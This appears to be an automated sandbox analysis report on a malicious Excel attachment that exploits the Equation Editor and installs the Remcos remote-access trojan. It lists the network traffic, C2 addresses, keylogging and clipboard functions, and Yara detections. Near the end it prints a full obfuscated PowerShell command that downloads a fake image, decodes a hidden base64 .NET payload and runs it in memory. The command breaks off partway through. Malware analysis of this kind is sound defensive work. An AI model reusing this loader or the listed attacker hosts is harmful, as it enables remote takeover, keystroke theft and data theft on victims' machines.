Source: Traffic	Snort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 172.232.56.138:80 -> 192.168.2.22:49176

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.14 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 216.9.224.18

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 6_2_005B2916 URLDownloadToFileW,ShellExecuteW,ExitProcess,

6_2_005B2916

Source: global traffic

TCP traffic: 192.168.2.22:49177 -> 216.9.224.18:9943

Source: global traffic	HTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /99032/WRESS.txt HTTP/1.1Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.21.11.106 104.21.11.106
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /1RxrR6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: woi.ggConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1RxrR6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: woi.ggConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/hu/hu.hu.huhuh.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /99032/goodflowersandgoodreturn.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_uidvpgdd.pgo.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.14

Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138
Source: unknown	TCP traffic detected without corresponding DNS query: 172.232.56.138

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 6_2_005B2916 URLDownloadToFileW,ShellExecuteW,ExitProcess,

6_2_005B2916

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1EBFA90.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /1RxrR6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: woi.ggConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1RxrR6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: woi.ggConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/hu/hu.hu.huhuh.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /99032/goodflowersandgoodreturn.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_uidvpgdd.pgo.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.14
Source: global traffic	HTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /99032/WRESS.txt HTTP/1.1Host: 172.232.56.138Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: woi.gg
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138
Source: powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138/99032/WRESS.txt
Source: powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138/99032/WRESXL
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000006.00000002.438034337.00000000005D3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000006.00000002.438034337.0000000000584000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138/99032/goodflowersandgoodreturn.gif
Source: EQNEDT32.EXE, 00000006.00000002.438034337.00000000005D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138/99032/goodflowersandgoodreturn.gifC:
Source: EQNEDT32.EXE, 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.232.56.138/99032/goodflowersandgoodreturn.gifj
Source: powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.232.58
Source: wscript.exe, 00000008.00000002.456398436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.14/Users_API/syscore/file_uB
Source: wscript.exe, 00000008.00000002.456398436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.456421617.000000000087F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456226459.000000000087D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456202348.000000000088C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456338283.000000000089F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456149772.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456236059.000000000088E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456317690.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456251442.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, goodflowersandgoodreturn[1].gif.6.dr, goodflowersandgoodreturn.vBS.6.dr	String found in binary or memory: http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt
Source: wscript.exe, 00000008.00000002.456456551.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456052828.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456251442.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456214083.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456242695.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt-)
Source: powershell.exe, 00000009.00000002.454900677.00000000063A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.194
Source: powershell.exe, 00000009.00000002.453615609.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453627782.0000000000310000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453644812.0000000000350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.194/imge/new
Source: powershell.exe, 00000009.00000002.454900677.00000000063A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.194/imge/new-im
Source: powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.194/imge/new-image_v.jpg
Source: powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453644812.0000000000350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.194/imge/new-image_v.jpgSEG;
Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.1043182519.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RegAsm.exe, 0000000B.00000002.1043182519.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpoj
Source: RegAsm.exe, 0000000B.00000002.1043182519.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpxj
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: woi.gg.url.4.dr	String found in binary or memory: http://woi.gg/
Source: Swift tract-20240506_120.xls, 1RxrR6.url.4.dr	String found in binary or memory: http://woi.gg/1RxrR6
Source: 56630000.0.dr, ~DFE0FBB2FDB2FD1126.TMP.0.dr	String found in binary or memory: http://woi.gg/1RxrR6yX
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Source: unknown	HTTPS traffic detected: 104.21.11.106:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.197:443 -> 192.168.2.22:49171 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

11_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_004168C1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\not\logs.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: Swift tract-20240506_120.xls	OLE: Microsoft Excel 2007+
Source: 56630000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1RxrR6.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\woi.gg.url			Jump to behavior

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3926
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3926			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8
